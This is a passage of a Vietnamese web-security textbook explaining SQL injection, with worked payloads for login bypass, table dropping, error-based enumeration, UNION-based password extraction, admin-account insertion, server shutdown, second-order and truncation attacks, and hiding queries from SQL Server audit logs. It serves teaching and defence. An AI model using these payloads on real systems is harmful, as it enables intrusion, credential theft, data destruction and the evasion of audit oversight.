CÁC CÁCH TẤN CÔNG

Một phần của tài liệu bao_mat_ung_dung_web_tren_internet_7039 (Trang 61)

III.1. Kĩ thuật tấn công SQL Injection

Dưới đây là kĩ thuật SQL injection đơn giản nhất, dùng để vượt qua các form đăng nhập.

Ví dụ 6.III.1-1: giả sử ứng dụng web có đoạn mã sau:

SQLQuery= “SELECT tkUsername FROM User WHERE tkUsername= ‘” & strUsername & “’ AND Password= ‘” & tkPassword & “’”

flag= GetQueryResult (SQLQuery) if flag = “” then

check=FALSE else

check=TRUE end if

Đoạn mã trên kiểm tra chuỗi nhập Username và Password. Nếu tồn tại trong bảng User thì check=true ngược lại check=false.

Giá tri nhập vào là:

Username: ’ OR ‘’=’

Chương 6: Chèn câu truy vấn SQL (SQL Injection)

Câu lệnh SQL lúc này như sau:

SELECT tkUsername FROM User WHERE tkUsername= ‘’ OR ‘’=’‘ AND Password= ‘’ OR ‘’=’’

Câu lệnh so sánh trên luôn luôn đúng (vì ‘’ luôn bằng ‘’). Do đó câu điều kiện

trong mệnh đề WHERE luôn đúng. Giá trị tên người sử dụng của dòng đầu tiên

trong bảng sẽ được chọn.

Kết hợp với kí tự đặc biệt của SQL :

• kí tự “ ; ” : đánh dấu kết thúc 1 câu truy vấn

• kí tự “--” : ẩn chuỗi kí tự phía sau nó trên cùng 1 dòng Ví dụ 6.III.1-2:

Username: ’; drop table User--

Password:

Câu lệnh SQL lúc này như sau:

SELECT tkUsername FROM User WHERE tkUsername= ‘’;drop table

User-- AND Password= ‘” & tkPassword & “’”

Với câu lệnh trên thì bảng User sẽ bị xóa hoàn toàn.

Ví dụ 6.III.1-3: Một ví dụ khác sử dụng kí tự đặc biệt SQL để thâm nhập vào hệ thống như sau:

Username: admin’--

Chương 6: Chèn câu truy vấn SQL (SQL Injection)

Câu lệnh SQL như sau:

SELECT tkUsername FROM User WHERE tkUsername= ‘admin’-- AND

Password= ‘” & tkPassword & “’” (adsbygoogle = window.adsbygoogle || []).push({});

Câu lệnh trên cho phép đăng nhập vào hệ thống với quyền admin mà không đòi

hỏi password.

III.2. Tấn công dưa vào câu lệnh SELECT

Ngoài kĩ thuật đơn giản trên, việc tấn công thường dựa trên những thông báo lỗi

để lấy thông tin về bảng cũng như những trường trong bảng. Để làm được điều này, cần phải hiểu những thông báo lỗi và từ đó chỉnh sửa nội dung nhập cho phù hợp.

Khái niệm Direct Injection:

Những đối số được thêm vào trong câu lệnh mà không nằm giữa những dấu nhấy

đơn hay dấu ngoặc kép là trường hợp direct injection. Ví dụ III.2.1 Ví dụ 6.III.2-1:

StrSQL=“SELECT tkUsername FROM User WHERE tkUsername=”& tName

Khái niệm Quote Injection:

Những trường hợp đối số được nhập vào đều được ứng dụng cho vào giữa hai dấu nháy đơn hay ngoặc kép là trường hợp Quote Injection. Ví dụ III.2.2

Ví dụ 6.III.2-2:

StrSQL=“SELECT tkUsername FROM User WHERE tkUsername=’”& tName & “’”

Chương 6: Chèn câu truy vấn SQL (SQL Injection)

Để vô hiệu hoá dấu nháy và thay đổi câu lệnh mà vẫn giữ được cú pháp đúng, chuỗi mã chèn thêm vào phải có một dấu nháy đơn trước chuỗi kí tự được chèn vào và ở cuối câu lệnh phải có một dấu nháy đơn, chẳng hạn như sau:

StrSQL=“SELECT tkUsername FROM User WHERE tkUsername=’’ and

‘’=’’”

Nếu đã thực hiện như trên mà thông báo lỗi có liên quan đến dấu “(“ thì trong chuỗi chèn vào phải có “)”:

Ví dụ 6.III.2-3: Giả sử:

StrSQL=“SELECT tkUsername FROM User WHERE (tkUsername=’”& tName & “’”)

Thì cú pháp hợp lệ như sau:

StrSQL=“SELECT tkUsername FROM User WHERE (tkUsername=’’)or

‘’=’’”

Ngoài ra kí tự % thường được dùng trong những trường hợp tìm kiếm thông tin.

Ví dụ 6.III.2-4:

StrSQL=“SELECT tkUsername FROM User WHERE tkUsername like ‘% “ & tName & “’”

Chương 6: Chèn câu truy vấn SQL (SQL Injection)

III.3. Tấn công dựa vào câu lệnh HAVING

HAVING sử dụng cùng chung với mệnh đề GROUP BY là phương pháp hữu hiệu để nhận thông tin bảng, trường… và sẽ được bàn sâu hơn trong phần 4.

III.4. Tấn công dựa vào câu lệnh kết hợp UNION (adsbygoogle = window.adsbygoogle || []).push({});

Lệnh SELECT được dùng để lấy thông tin từ cơ sở dữ liệu. Thông thường vị trí có thể được chèn thêm vào một mệnh đề SELECT là sau WHERE. Để có thể trả về nhiều dòng thông tin trong bảng, thay đổi điều kiện trong mệnh đề WHERE bằng cách chèn thêm UNION SELECT.

Ví dụ 6.III.4-1:

StrSQL=“SELECT tkUsername FROM User WHERE tkUsername like ‘% “ & tName & “’UNION SELECT tkPassword from User”

Câu lệnh trên trả về một tập kết quả là sự kết hợp giữa tkUsername với tkPassword trong bảng User.

Ghi chú:

• Số cột trong hai câu SELECT phải khớp với nhau. Nghĩa là số lượng cột trong câu lệnh SELECT ban đầu và câu lệnh UNION SELECT phía sau bằng nhau và cùng kiểu.

Nhờ vào lỗi cú pháp trả về sau khi chèn thêm câu lệnh UNION mà có thể biết kiểu của mỗi trường.

Chương 6: Chèn câu truy vấn SQL (SQL Injection)

Sau đây là những ví dụ được thực hiện khi không biết nội dung cơ sở dữ liệu dựa vào HAVING, GROUP BY, UNION:

Ví dụ 6.III.4-2: Nhắc lại câu truy vấn cần để đăng nhập:

SQLQuery= “SELECT tkUsername,tkPassword FROM User WHERE

tkUsername= ‘” & strUsername & “’ AND Password= ‘” & tkPassword & “’”

Đầu tiên, để biết tên bảng và tên trường mà câu truy vấn sử dụng, sử dụng câu điều kiện “having” , như ví dụ sau:

Giá trị nhập vào:

Username: ’having 1=1--

Lỗi phát sinh:

[Microsoft][ODBC SQL Server Driver][SQL Server]Column

'User.tkUsername' is invalid in the select list because it is

not contained in an aggregate function and there is no GROUP BY

clause.

Nhờ vào lỗi phát sinh này mà biết được bảng sử dụng trong câu truy vấn là User

và trong bảng tồn tại một trường tên là tkUsername. Sau đó sử dụng GROUP BY:

Ví dụ 6.III.4-3:

Chương 6: Chèn câu truy vấn SQL (SQL Injection)

Lỗi phát sinh:

[Microsoft][ODBC SQL Server Driver][SQL Server]

Column'User.tkPassword'is invalid in the select list because it

is not contained in either an aggregate function or the GROUP BY

clause.

Như vậy tkPassword là một trường của bảng User và được sử dụng trong câu truy (adsbygoogle = window.adsbygoogle || []).push({});

vấn.

Tiếp tục dùng GROUP BY cho đến khi biết được tất cả các trường trong bảng

User tham gia vào câu truy vấn.

Khi không còn báo lỗi cú pháp GROUP BY nữa thì chuyển qua công đoạn kiểm

tra kiểu của từng trường trong bảng. Lúc này UNION được sử dụng: Ví dụ 6.III.4-4:

Username:’union select sum(tkUsername) from User

Lệnh sum là lệnh tính tổng cho đối số bên trong dấu ngoặc. Đối số phải là kiểu số.

Nếu đối số không là kiểu số thì phát sinh lỗi như sau:

[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a varchar data type as

an argument.

Như vậy với thông điệp lỗi như trên thì tkUsername chắc chắn phải là kiểu “varchar”.

Chương 6: Chèn câu truy vấn SQL (SQL Injection)

Với phương pháp trên, dễ dàng xác định được kiểu của từng trường trong bảng.

Sau khi đã nhận đầy đủ trông tin trên thì hacker dễ dàng tự thêm thông tin vào

bảng User. Ví dụ 6.III.4-5:

Username:’; insert into User(tkUsername,tkPassword) values

(‘admin’, ‘’)--

Hacker thêm nội dung như Ví dụ 6.III.4.2.4 bây giờ trở thành người quản trị mạng

mà không cần mật khẩu để chứng thực.

Ví dụ 6.III.4-6: minh hoạ một công đoạn sẽ giúp hacker đọc hết thông tin trong

bảng User:

• Bước 1: Tạo một Stored procedure để chép vào tất cả thông tin của 2 trường tkUsername và tkPassword trong bảng User thành một chuỗi vào một bảng

mới là foo có một trường là ret bằng đoạn mã sau:

create proc test as

begin

declare @ret varchar(8000) set @ret=':'

select @ret=@ret+' '+tkUsername+'/'+tkPassword from User select @ret as ret into foo

end

Thực thi câu lệnh bằng cách nhập vào form.

Username:’;Create proc test as begin declare @ret (adsbygoogle = window.adsbygoogle || []).push({});

Chương 6: Chèn câu truy vấn SQL (SQL Injection)

'+tkUsername+'/'+tkPassword from User select @ret as ret into foo

• Bước 2: Gọi Stored procedure đó

Sau khi đã tạo được stored procedure như trên, thực hiện lời gọi hàm:

Username:’;exec test

• Bước 3: Dùng UNION để xem nội dung bảng foo

Username:’;select ret,1 from foo union select 1,1 from foo

Lỗi phát sinh:

Microsoft OLE DB Provider for ODBC Drivers error

'80040e07'[Microsoft][ODBC SQL Server Driver][SQL

Server]Syntax error convertingthe varchar value ':

admin/passofAdmin nhimmap/passofnhimmap minhthu/passofminhthu'

to a column of data type int.

Qua một số công đoạn, hacker đã thu được nội dung của bảng User gồm có tên

tkUsername và mật khẩu tkPassword.

• Bước 4: Ngoài ra hacker còn có thể cẩn thận xoá bảng foo để xoá dấu vết:

Username: ‘; drop table foo--

Ví dụ 6.III.4-7: Còn đây là một cách khác để xác định nội dung của bảng User, còn một phương pháp tìm kiếm thông tin như sau:

• Bước 1:

Tìm tuần tự từng dòng trên bảng User

Chương 6: Chèn câu truy vấn SQL (SQL Injection)

hoặc :

Username:’union select min(tkUsername),1 from User where

tkUsername> ’a’--

Lỗi phát sinh:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'admin' to a column of data type

int.

Người đầu tiên trong bảng User là “admin”. • Bước 2:

Để biết các giá trị tiếp theo, nhập chuỗi sau:

Username:’;select min(tkUsername),1 from User where (adsbygoogle = window.adsbygoogle || []).push({});

tkUsername> ’admin’union select 1,1 from User

Lỗi phát sinh:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting

the varchar value 'nhimmap' to a column of data type int.

• Bước 3:

Thực hiện như bước 2 cho ra kết quả là từng dòng với trường tkUsername

Chương 6: Chèn câu truy vấn SQL (SQL Injection)

• Bước 4:

Để biết thêm về tkPasswork, có thể thực hiện như sau:

Username:’;select tkPassword,1 from User where tkUsername=

’admin’union select 1,1 from User

Lỗi phát sinh:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting

the varchar value 'passOfAdmin' to a column of data type int.

Để biết thông tin về các bảng, cột trong cơ sở dữ liệu, có thể truy vấn bảng đến

bảng hệ thống INFORMATION_SCHEMA.TABLES. Ví dụ 6.III.4-8:

select TABLE_NAME from INFORMATION_SCHEMA.TABLES

INFORMATION_SCHEMA.TABLES chứa thông tin về tất cả các table có trên

server. Trường TABLE_NAME chứa tên của mỗi table trong cơ sở dữ liệu.

SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE

TABLE_NAME='User'

Câu lệnh trên được sử dụng để biết thông tin về cột trong bảng.

Chương 6: Chèn câu truy vấn SQL (SQL Injection)

Ví dụ 6.III.4-9: Để biết ứng dụng đang chạy trên Server nào, có thể xác định bằng cách sau:

Username:’;select @@SERVERNAME union select 1

Lỗi phát sinh:

Microsoft OLE DB Provider for ODBC Drivers error

'80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax

error converting the varchar value 'KHOAI_NGU' to a column of

data type int. (adsbygoogle = window.adsbygoogle || []).push({});

III.5. Tấn công dưa vào lệnh INSERT

Từ khoá INSERT dùng để đưa thông tin vào cơ sở dữ liệu. Thông thường câu lệnh INSERT được dùng trong các trường hợp như: thông tin đăng kí người sử

dụng, guestbook…v..v…

Kĩ thuật “;”, “--“ được dùng như đã từng dùng với câu lệnh SELECT, phải đảm bảo đúng số lượng và kiểu giá trị được nhập vào nhằm tránh lỗi về cú pháp (nếu

không xác định được kiểu dữ liệu có thể nhập tất cả là số). Ví dụ 6.III.5-1:

SQLString= “INSERT INTO User VALUES (‘” & strUsername & “’, ‘” &

Chương 6: Chèn câu truy vấn SQL (SQL Injection)

III.6. Tấn công dưa vào STORED PROCEDURE

Stored Procedure được sử dụng trong lập trình Web với mục đích giảm sự phức tạp trong ứng dụng và tránh sự tấn công trong kĩ thuật SQL Injection. Tuy nhiên hacker vẫn có thể lợi dụng những Stored Procedure để tấn công vào hệ thống. Ví dụ 6.III.6-1: Stored procedure sp_login gồm hai tham số là username và password. Nếu nhập:

Username: nhimmap

Password: ‘;shutdown--

Lệnh gọi stored procedure như sau:

exec sp_login ‘nhimmap’,‘’;shutdown--’

Lệnh shutdown thực hiện dừng SQL Server ngay lập tức.

III.7. Nâng cao

III.7.1. Chuỗi kí tự không có dấu nháyđơn:

Những nhà lập trình có thể bảo vệ ứng dụng của họ bằng cách loại bỏ tất cả dấu nháy, thông thường loại bỏ dấu nháy bằng cách thay một dấu nháy thành 2 dấu nháy.

Ví dụ 6.III.7.1-1:

Function escape (input)

Input=replace(input, “’”, “’’”) escape=input

Chương 6: Chèn câu truy vấn SQL (SQL Injection)

Rõ ràng là, nó ngăn chặn được tất cả những kiểu tấn công trên. Tuy nhiên nếu muốn tạo ra một chuỗi giá trị mà không dùng các dấu nháy, có thể dùng hàm “char()” như ví dụ sau:

Ví dụ 6.III.7.1-2:

INSERT into User VALUES(666, char(0x63) +char(0x68)

+char(0x72) char(0x69) +char(0x73) ,char(0x63) +char(0x68) +char(0x72) +char(0x69) +char(0x73),0xffff)

Ví dụ 6.III.7.1-3 trên tuy là một câu truy vấn không có dấu nháy đơn nào

nhưng nó vẫn có thể insert chuỗi vào bảng, và tương đương với:

INSERT into User VALUES( 666,’chris’,’chris’,255)

Hacker cũng có thể chọn username , password là số để tránh dấu nháy như ví dụ sau:

Ví dụ 6.III.7.1-4: (adsbygoogle = window.adsbygoogle || []).push({});

INSERT into User VALUES( 667,123,123,0xffff)

SQL server sẽ tự động chuyển từ số sang chuỗi.

III.7.2. Tấn công 2 tầng

Mặc dù ứng dụng đã thay thế dấu nháy đơn nhưng vẫn còn khả năng bị chèn đoạn mã SQL .

Ví dụ 6.III.7.2-1: Để đăng kí account trong ứng dụng, nhập username như sau:

Username: admin'—

Chương 6: Chèn câu truy vấn SQL (SQL Injection)

Ứng dụng sẽ thay thế dấu nháy, kết quả trong câu insert sẽ như sau:

INSERT into User VALUES(123, 'admin''--', 'password',0xffff)

(nhưng trong cơ sở dữ liệu sẽ lưu là “admin’--“)

Giả sử rằng ứng dụng cho phép người dùng thay đổi mật khẩu. Các đoạn mã

ASP được thiết kế đảm bảo rằng người sử dụng phải nhập đúng mật khẩu cũ

trước khi nhập mật khẩu mới. Đoạn mã như sau:

username = escape( Request.form("username") ); oldpassword = escape( Request.form("oldpassword") ); newpassword = escape( Request.form("newpassword") ); var rso = Server.CreateObject("ADODB.Recordset");

var sql = "select * from users where username = '" + username + "' and password = '" + oldpassword + "'";

rso.open( sql, cn ); if (rso.EOF) {…

Câu truy vấn thiết lập mật khẩu mới như sau:

sql = "update users set password = '" + newpassword + "' where

username= '" + rso("username") + "'"

rso(“username”) chính là giá trị username có được câu truy vấn login và nó là admin’--

Chương 6: Chèn câu truy vấn SQL (SQL Injection)

update users set password = 'password' where username =

'admin'--'

Nhờ đó hacker có thể thay đổi mật khẩu của admin bằng giá trị của mình.

Đây là 1 trường hợp còn tồn tại trong hầu hết những ứng dụng lớn ngày nay có sử dụng cơ chế loại bỏ dữ liệu. Giải pháp tốt nhất là loại bỏ những giá trị lỗi hơn là chỉnh sửa lại. Nhưng có một vấn đề là có một số ô nhập dữ liệu (như ô

nhập tên) cho phép những kí tự này. Ví dụ: O’Brien.

Cách tốt nhất để giải quyết vấn đề này là không cho phép nhập dấu nháy đơn. Nếu điều này không thể thực hiện được , thì loại bỏ và thay thế như trên.

Trong trường hợp này, cách tốt nhất là đảm bảo tất cả dữ liệu được đưa vào câu truy vấn SQL (kể cả những giá trị trong cơ sở dữ liệu) phải được kiểm soát một cách chặt chẽ.

Một số ứng dụng phòng chống việc thêm câu truy vấn từ người dùng bằng cách giới hạn chiều dài của ô nhập. Tuy nhiên, với giới hạn này thì một số kiểu tấn công không thể thực hiện được nhưng vẫn có chỗ hở để hacker lợi dụng.

Ví dụ 6.III.7.2-2: (adsbygoogle = window.adsbygoogle || []).push({});

Giả sử cả username và password đều bị giới hạn tối đa là 16 kí tự. Nhập:

Username: aaaaaaaaaaaaaaa’

Chương 6: Chèn câu truy vấn SQL (SQL Injection)

Ứng dụng sẽ thay thế một dấu nháy đơn bằng hai dấu nháy đơn nhưng do

chiều dài chuỗi bị giới hạn chỉ là 16 kí tự nên dấu nháy đơn vừa được thêm sẽ

bị xoá mất. Câu lệnh SQL như sau:

Select * from users where username=’aaaaaaaaaaaaaaa’’ and

password=’’’; shutdown—‘

kết quả là username trong câu lệnh có giá trị là:

aaaaaaaaaaaaaaa’ and password=’

III.7.3. Tránh sự kiểm soát:

SQL server có một giao thức kiểm soát chặt chẽ bằng họ hàm sp_traceXXX, cho phép ghi nhân nhiều sự kiện xảy ra trong cơ sở dữ liệu. Đặc biệt là các sự

kiện T-SQL, ghi nhận lại tất cả các câu lệnh SQL thực hiện trên Server. Nếu chế độ kiểm soát được bật thì tất cả các câu truy vấn SQL của hacker cũng bị

ghi nhận và nhờ đó mà một người quản trị có thể kiểm soát những gì đang xảy

ra và nhanh chóng tìm ra được giải pháp. Nhưng cũng có một cách để chống lại điều này, bằng cách thêm dòng “sp_password” vào câu lệnh T-SQL, vì khi gặp chuỗi này thì việc kiểm tra sẽ ghi nhận như sau:

-- ‘sp_password’ was found in the text of this event.

-- The text has benn replaced with this comment for security

reasons.

ngay cả khi “sp_password” xuất hiện trong phần chú thích.

Vì thế để dấu tất cả câu truy vấn tấn công, chỉ cần đơn giản là thêm sp_password vào sau ‘--’ như sau:

Chương 6: Chèn câu truy vấn SQL (SQL Injection)

Username:admin’--sp_password

Một phần của tài liệu bao_mat_ung_dung_web_tren_internet_7039 (Trang 61)